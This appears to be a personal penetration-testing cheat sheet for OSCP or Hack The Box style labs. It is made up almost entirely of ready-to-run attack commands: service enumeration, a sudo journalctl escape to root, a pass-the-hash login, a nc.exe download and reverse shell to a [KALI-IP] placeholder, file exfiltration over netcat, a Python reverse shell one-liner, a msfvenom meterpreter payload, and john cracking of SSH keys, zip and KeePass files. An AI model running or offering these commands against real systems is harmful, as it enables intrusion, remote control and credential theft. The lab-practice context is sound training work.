ip="10.10.10.5"
nmap -Pn -sC -sV -oA nmap $ip
https://github.com/theonlykernel/enumeration/wiki
https://medium.com/oscp-cheatsheet/oscp-cheatsheet-6c80b9fa8d7e
wpscan --disable-tls-checks --url $url
auxiliary/scanner/smb/smb_version
nmblookup -A $ip
smbclient -L $ip
wordlist: /usr/share/wordlists/dirb/common.txt
URL to fuzz (find file in unknown folder)
/{dir}/phpbash.min.php
./gobuster dir -u $url -w /usr/share/wordlists/dirb/common.txt
nmap -sV -Pn -vv -p 21 --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 $ip
## set keyboard layout
setxkbmap -layout de
# set timezone
sudo dpkg-reconfigure tzdata
find / -name test.py 2>/dev/null
https://unix.stackexchange.com/questions/200637/save-all-the-terminal-output-to-a-file
# Convert RAW Output to TXT
cat $SCRIPT_LOG_FILE | perl -pe 's/\e([^\[\]]|\[.*?[a-zA-Z]|\].*?\a)//g' | col -b > $txtfile
# show alternate datastreams
dir /R
# output alternate datastreams
powershell Get-Content -Path "hm.txt" -Stream "root.txt"
https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
meterpreter > cd %TEMP%
meterpreter > pwd
C:\Windows\TEMP
meterpreter > background
use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf5 post(multi/recon/local_exploit_suggester) > run
# size termain windows very small
usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
!/bin/sh
# whoami
root
pth-winexe -U$domain/$username%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //$ip cmd
powershell wget "http://[KALI-IP]/windows-resources/binaries/nc.exe" -outfile nc.exe
nc.exe -e cmd.exe [KALI-IP] 1234
#on Kali listen with
nc -nvlp 1234
# listen on kali with
nc -lp 1235 > [FILENAME]
# transfer file on victim
nc.exe -w 3 [KALI-IP] 1235 <[FILENAME]
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.29",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# make shell better
python -c 'import pty; pty.spawn("/bin/bash");'
#on Kali listen with
nc -nvlp 1234
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lab_ip LPORT=1234 -f aspx > devel.aspx
john --wordlist=/home/mallab/Downloads/rockyou.txt htpasswd.txt
python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
sudo john --wordlist=rockyou.txt id_rsa.hash
/usr/sbin/zip2john avedb.zip > avedb.zip.hashes
sudo john --wordlist=rockyou.txt avedb.zip.hashes
sudo keepass2john jeeves.kdbx > jeeves.hash